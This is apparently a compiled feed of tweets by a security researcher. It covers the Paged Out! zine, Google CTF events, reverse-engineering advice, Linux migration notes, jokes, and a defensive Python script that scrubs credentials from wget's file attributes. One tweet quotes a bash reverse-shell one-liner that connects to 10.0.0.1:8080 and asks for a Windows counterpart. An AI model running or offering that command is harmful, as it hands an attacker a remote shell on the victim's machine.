Me coding with ~5y experience:
1. write code
Me coding with ~30y experience:
1. read docs for fopen()
2. write 1 line of code
3. check 17 different things in docs/internets about fopen
4. reverse fopen implementation because this one detail...
5. decide to use different function.
Paged Out! #1 is out! (and it's free to download!)
There are 57 articles in 12 categories:
Electronics
Programming
Assembly
Reverse Engineering
Sec/Hack
Retro
File Formats
Algorithmics
SysAdmin
Radio
Phreaking
OS Internals
Enjoy!
#PagedOut!
Friday was my last day at Google. I'm saddened to leave behind my team of the last 12+ years, but I know Google's security is in great hands.
It's time for a short break and then I'm moving on with plans I've made long ago – my own sec research, consulting, and education company.
My first program in Python! I still find this syntax a bit confusing with no { } etc.
def main(
    line0: print("Hello World!"),
    line1: print("What's your name?"),
    line2: (x := input("Name plz: ")),
    line3: print(f"Your name is: {x}")
):
    pass
So an AMD engineer and 2 Google engineers walk into a bar... and write an article about how "Hello World" in #Python works.
The article turns out to be 26 pages. From Python, through C, WinAPI/Kernel, font rendering, to GPU.
Enjoy!
"Hello World under the microscope" - an article we wrote together with @gynvael and @j00ru! Originally published in issue 100 (1/2022) of the Programista magazine, now available online in Polish and English.
A fun and innovative ZIP bomb by David Fifield (and an excellent technical write-up - take a look if you like file format hacks):
zbsm.zip: 42 kB → 5.5 GB
zblg.zip: 10 MB → 281 TB
zbxl.zip: 46 MB → 4.5 PB
I just randomly found a YouTube channel with 22 videos that explain modern cryptographic algorithms + show how to implement them in Python! Awesome for learning crypto!
The channel has 80 subs.
Any chance we could show some love to the creator?
Plz RT
Boss: Hey IT guy, can you program our pharmacy logo to flash or sth?
Bob: Say no more!
Narrator: Bob, a demoscene veteran, was waiting for this opportunity for 25 years.
TIL from @q3k and @marcan42: wget saves downloaded file's source URL (and sometimes referrer) in extended attributes.
This includes the cases where the URL has a user/password in it 🙃
$ getfattr -d -m - test
user.xdg.origin.url="https://user:[email protected]/"
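As an added example (not from the tweet or from wget itself), a Python check that parses a getfattr dump, flags origin/referrer URLs that embed credentials, and strips the userinfo part; scrub_file does the same directly on a file's xattrs via os.getxattr (Linux only). The dump and the URLs in it are constructed sample values.

```python
import os
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample of `getfattr -d -m - <file>` output (not a real capture).
SAMPLE_DUMP = """# file: test
user.xdg.origin.url="https://user:pass@example.test/"
user.xdg.referrer.url="https://example.test/index.html"
"""
# Matches the key="value" lines getfattr prints for text-valued attributes.
ATTR_RE = re.compile(r'^(user\.[\w.\-]+)="(.*)"$')

def parse_getfattr(dump):
    """Turn a getfattr dump into a {attribute_name: value} dict."""
    attrs = {}
    for line in dump.splitlines():
        m = ATTR_RE.match(line.strip())
        if m:
            attrs[m.group(1)] = m.group(2)
    return attrs

def has_credentials(url):
    """True if the URL's authority carries a userinfo part (user or user:password)."""
    parts = urlsplit(url)
    return bool(parts.username or parts.password)

def strip_credentials(url):
    """Return the URL with the userinfo part removed; host and port are kept verbatim."""
    parts = urlsplit(url)
    netloc = parts.netloc.rsplit("@", 1)[-1]
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))

def find_leaky_attrs(attrs):
    """Names of *.url attributes whose values embed credentials."""
    return [k for k, v in attrs.items() if k.endswith(".url") and has_credentials(v)]

def scrub_file(path):
    """Rewrite wget's origin/referrer xattrs on a real file (Linux), dropping credentials."""
    fixed = []
    for name in ("user.xdg.origin.url", "user.xdg.referrer.url"):
        try:
            value = os.getxattr(path, name).decode()
        except OSError:          # attribute absent or xattrs unsupported here
            continue
        if has_credentials(value):
            os.setxattr(path, name, strip_credentials(value).encode())
            fixed.append(name)
    return fixed
```

Run scrub_file over a downloads directory to clean files already on disk; for new downloads, wget's --no-xattr option avoids writing the attributes in the first place.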
Random tip for Windows users:
If you are worried about accidentally double-clicking a malicious executable in your Download folder or are worried about random DLLs (carpet bombing / DLL hell), just DISABLE EXECUTION in that folder:
icacls Download /deny Everyone:(OI)(IO)(X)
I think these are the two most useful posts I have on my blog (i.e. I'm referencing them in chat a lot):
FAQ: How to learn reverse-engineering?
FAQ: How to find vulnerabilities?
If you're just starting in programming/infosec, here's a list of obvious and less obvious things you can put on your CV - a 🧵
Some of these things can be done in a week and might improve your CV.
Did I miss something? Please add to the thread.
And RT so it helps more people :)
Yesterday's "Breaking "DRM" in Polish trains" talk by @dsredford / MrTick / q3k was one of the best investigative reverse-engineering case studies I've seen. It's a must watch.
Service announcement:
I've got the so-called long-COVID (3 months in at this point), so currently all my projects (YouTube livestreams, @pagedout_zine, etc) are put on hold until I get better. Sorry!
Paged Out! #2 (Nov 2019) is out! And it's free to download :)
This issue has 55 articles in 11 categories:
Programming
OS Internals
Assembly
Operating Systems
GameDev
Electronics
Security/Hacking
SysAdmin
Reverse Engineering
Algorithms
Writing Articles
Windows 11 is wonderful!
So I'm switching to Linux (Kubuntu) on my main PC - apologies to all hackers who had a shell on my device from the last re-install ~10-16 years ago.
Anyway, I'll use this thread to note some funny bits I notice during migration.
Call for One Page Articles for the 1st issue of Paged Out! zine!
(it's a new free experimental deeply technical zine we're starting; it's about programming/security/hacking/demoscene/retro/electronics/etc)
Details:
Story:
Please RT :)
So @j00ru published two posts on Windows Registry; given that there were a lot of fixes in Windows Registry in recent months I expect these to be fun ;)
Ah dealing with companies with poor security processes is always such a pleasure.
Here's Powertek threatening me with their lawyers for disclosing (patched) vulnerabilities in their PDUs:
If you're into programming, hacking, retro computers, electronics, etc check out our free magazine:
💾 Issues #1 and #2 are already out!
For Issue #3 we're looking for:
- Articles and Art!
- Free community ads!
- And sponsorship ads!
Deadline: 20.02.20
Woah that was a busy month!
- Google CTF Finals (co-organizing)
- Security PWNing Conference (co-organizing)
- Dragon CTF (co-organizing)
- Paged Out! #2 (organizing)
Time for some rest :)
An informal review of CTF abuse (or how folks try to win CTFs in a not purely ethical way):
Know more stories like this which I've missed? Please share!
A pretty amazing opportunity to see (and compare RE methods of) 4 security youtubers/streamers as they go against an upgraded Google CTF 2018 BQ RE challenge -
Kudos to ReverseiT & @MurmusCTF @Zanidd @_johnhammond @LiveOverflow!
ingredients=flour%20butter%20sugar%20egg%20salt;temperature=180;mix=1;bake=1
If Twitter can store its cookies in my browsers, I'm going to store my cookies on Twitter 😠
I'm going to do a longer stream tomorrow (expected 4h) to solve all the challenges from Google's CTF Beginners Quest 2019.
There are 13 challenges, some of them having two flags.
Should be fun :)
#googlectf
Any ideas for Masters/Bachelors thesis topics around malware analysis, reverse engineering, low-level security or other infosec topics?
Please RT too - I get this question a lot and I always struggle to answer. So I hope to use our community's wisdom and send folks here :)
Current collection of cursed operators in various programming languages (from various sources).
New submissions welcomed!
Featuring at least #javascript #python #c and #cpp, but most of these "work" in other languages too.
So it's been about a month since I switched from Windows 10 to Linux (Kubuntu) on my main workstation. Here's a 🧵with some thoughts.
If you have any hints towards the points below, or in general, do let me know :)
A really solid command-line JSON viewer for Linux I found today: - super useful when dealing with documented-as-usual-so-not-at-all JSON APIs :)
Remember to type :help to see keyboard shortcuts. And it also supports mouse in a proper way!
Question: An up-to-date book for getting to know Linux Kernel (internals)?
Recommendations welcomed :)
If you have non-book resources on the topic: also welcomed!
If you're wondering why we explicitly banned cryptocurrency/blockchain ads, here are a couple of fun screenshots (the 1st one is from a PM, the rest from my public discord) ;)
#pagedout
New into CTFs? Full-format ranked CTFs look scary? Or just looking to have fun and learn something? Try the Beginners Quest @ Google CTF Quals :)
#GoogleCTF
In the topic of #GoogleCTF - I will be showing how to solve all of the Beginners Quest challenges on a special livestream tomorrow (Tue), 8pm CEST:
(recording will be available)
The final match of Hackceler8 (GoogleCTF Final Event) is now over!
1st + $3k. PPP (@PlaidCTF)
2nd + $2k. I Use Bing
3rd + $1k. pasten (@pastenctf)
4th + $500. TFNS (@FlatNetworkOrg)
Congratz!
Our experimental speed-hacking competition is now over. Videos soon! GG :)
In case you're wondering how block ciphers work...
(one of my viewers sent it to me; too funny not to share; in my defense, the stream wasn't about block ciphers 🙃)
This reminded me of when early in my career I reported a vulnerability in Starcraft map format (potential RCE) to Blizzard and in reply got advice to install an anti-virus and a firewall 🙃
Reporting vulnerabilities is an art of its own 😆
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ?
Obligatory disclaimer: Asking for a friend.
Recording of solving all (19) challenges from #GoogleCTF Beginners Quest is up: (description has timestamps for all challenges + a link to the github repo with scripts/notes)
Our security team is hiring in Zurich/Sunnyvale/Seattle!
We're looking for security specialists interested in security code reviews of both large complex systems and smaller applications (all over the software stack - from web apps, down to even firmware).
DM me if interested.
A question:
Which infosec companies employ & hire folks on Vulnerability Researcher position (>50% of work time spent on vulnerability research)?
I know a few, but I'm wondering if there are more companies like that. And yes, I know it's pretty rare :)
Stephen from my team just published his amazing research on Spectre exploitation in JS via Browser (spoiler: yes, it's exploitable)!
Details on , but also at .
Service announcement update:
Still having post COVID syndrome (9 months in at this point). All projects (YouTube livestreams, @pagedout_zine, etc) are still on hold. Sorry!
Trying to add enough cameras over my hardware desk so I could actually include it in livestreams. Progress so far includes 2 main cameras in place (overhead and microscope) and a lot of cable management on the horizon.
Boosting signal for folks analyzing liblzma/xz:
q3k: "I have managed to extract a list of encoded strings within the liblzma/xz backdoor payload (5.6.1)"
@LiveOverflow
@svblxyz
@KodyKinzie
@YouTube
Nah, our channels will be fine since we only show how to bypass INsecure computer systems ;)
On a more serious note I'll take a look when I'm back from vacation.
Hey @github, what's the reason that you're allowing an account impersonating me, abusing my copyrights+trademarks to stand active for over 11 days from it being reported to you by multiple parties?
Is this the typical pace you're dealing with abuse?
Ctx:
Dear Jonathan: "Accepted" means an engineer has accepted to look at your report - that's about it, nothing less, nothing more.
It does not mean your report has been considered valid - this will be decided later on and communicated in a reply.
Absolutely amazing article on ZIP files by @hansw2000, with in-depth description of the compression algorithms and a step-by-step example implementation!
Hey folks! Since my sabbatical is over I wanted to grab this opportunity to discuss what was (Google), what will be (my next plans), and get back to livestreaming at the same time.
EN (this Tue 8PM CEST):
PL (this Wed 8PM CEST):
Our CTF team placed top1 @ in 2019!
That's the 3rd top1 in the history of our team, and I'm really proud of our team's accomplishments!
Kudos to our captain valis, our vice-captain @dsredford, all the team members and all guest players that played with us!
2019 was a great year for Dragon Sector!
🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team
🥇1st place at 2 CTFs
🥈2nd place at 5 CTFs
🥉3rd place at 5 CTFs
💻And also organized a well received Dragon CTF 2019!
How to make sure no one complains about your soldering quality - tutorial:
1. Solder wires to the PCB.
2. Put a huge blob of glue on top of it.
3. ...
4. Profit?
This case is hilarious ;)
It's an 0-day. When SSD tried to report to @NETGEAR / @Bugcrowd, whoever handled the report seems to have misread the newest firmware version for R7000 as 1.3.2.134, and the bug affects only 1.0.11.116. Problem is, 1.0.11.116 is the newest fw🙃
New advisory is now out!
The Nighthawk R7000 is a popular Netgear router, with over 50,000 positive reviews on Amazon.
Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication.
I'm in full vacation mode and I decided to play Amberstar (1992).
I played a few hours and decided the UX is, well, 1992-like. So now I'm learning AmigaOS/M68K assembly to change some things that were annoying me...
I'll be posting some curious things I find in this thread.
This! The "Reverse Compilation Techniques" thesis by @criscifuentes was one of two main resources I've used when learning reverse engineering (the other was "Reversing: Secrets of Reverse Engineering" book). Definitely recommended reading :)
A sometimes lost fact, but the entire field of decompilation using compiler and program analysis techniques that we know as standard practice today as seen in IDA Hex Rays and Ghidra was invented by @criscifuentes and her thesis on the DCC decompiler in 1994.
This idea is absolutely barbaric and just gruesome. Folks, I am a vulnerability researcher. I stare at the screen the whole day looking at code. And you want me to do THIS?! The whole idea is bound to just bring pain and suffering to people.
I'm fine with the boxing part though.
@hackthebox_eu ok, hear me out.
"Hack The Boxing". It's like Chess Boxing, but we alternate between boxing and solving a HTB machine.
I just thought up the concept, but can't claim credit for the name.
Finally reached 10k subs on my English YT channel! :)
Thank you for your trust! (though seriously, keep verifying what I say)
And kudos + big thx to my livestream team for helping me out:
@foxtrot_0x4fult
@KrzaQ2
@disconnect3d_pl
@masakralol
and maryush :)
One of my favorite things about Switzerland:
trust in society
The flower shop in the photo is closed, but the merchandise is left outside. The sign blocking the door says "if the door is closed, it's self service; scan QR-CODE to pay with TWINT".
And that's not a rare thing!
After a long wait we released match videos/sources of our experimental CTF-meets-speedrunning competition - Hackceler8!
BIG THANKS to the competing CTF teams and all the Hackceler8 organizers!